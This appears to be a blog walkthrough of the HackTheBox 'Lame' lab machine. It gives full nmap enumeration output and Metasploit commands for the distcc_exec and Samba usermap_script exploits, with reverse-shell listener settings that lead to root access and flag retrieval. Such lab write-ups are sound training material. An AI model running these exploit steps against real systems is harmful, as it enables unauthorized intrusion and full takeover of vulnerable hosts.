This is, in my opinion, the easiest box on the HTB platform. You find a vulnerability and just exploiting it reveals all the flags.
Enumeration Link to heading
Let’s start with an nmap scan:
nmap -Pn -A 10.10.10.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 20:46 CEST
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.221
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m26s, deviation: 2h49m45s, median: 24s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2025-05-26T14:47:35-04:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.70 seconds
We learn that the FTP service allows anonymous logins which is very unsafe, however no file is found. It also seems vulnerable to a backdoor RCE.
The SSH service does not seem particularly vulnerable.
The SMB server seems to be vulnerable. Before we address it, let’s verify we didn’t miss any ports:
nmap -p- -Pn 10.10.10.3
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
There is one uncommon port we missed. Let’s check it out:
nmap -Pn -A -p 3632 10.10.10.3
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-26 20:59 CEST
Nmap scan report for 10.10.10.3
Host is up (0.079s latency).
PORT STATE SERVICE VERSION
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
The distccd service is apparently a C compiler, the version does appear to be vulnerable.
Vulnerability Link to heading
distccd Link to heading
First, let’s check the uncommon port as it is usually more susceptible to be the solution.
It is found that there is a vulnerability for this version of the servie and metasploit has a module for it:
msfconsole -q
msf6 > search distccd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
Let’s select that exploit and run it:
use 0
set rhosts 10.10.10.3
set lhost tun0
check
[+] 10.10.10.3:3632 - The target is vulnerable.
The exploit tells us the target is vulnerable:
run
[*] Started reverse TCP handler on 10.10.14.221:4444
[*] 10.10.10.3:3632 - stderr: bash: 106: Bad file descriptor
[*] Exploit completed, but no session was created.
We keep getting this even after several attempts. Before getting more serious into it, let’s check out the SMB vulnerability.
SMB Link to heading
Let’s see if we have better luck with the SMB vulnerability. According to our nmap scan, the target is a linux machine running Samba version 3.0.20-Debian. The usermap_script seems promising.
msfconsole -q
search usermap_script
use 0
set rhosts 10.10.10.3
set lhost tun0
exploit
<SNIP>
whoami
root
Post-Exploitation Link to heading
It lands a shell as root directly, so no need for privilege escalation. Let’s cat the flags and own the machine:
cat /root/root.txt
cat /home/makis/user.txt
The end.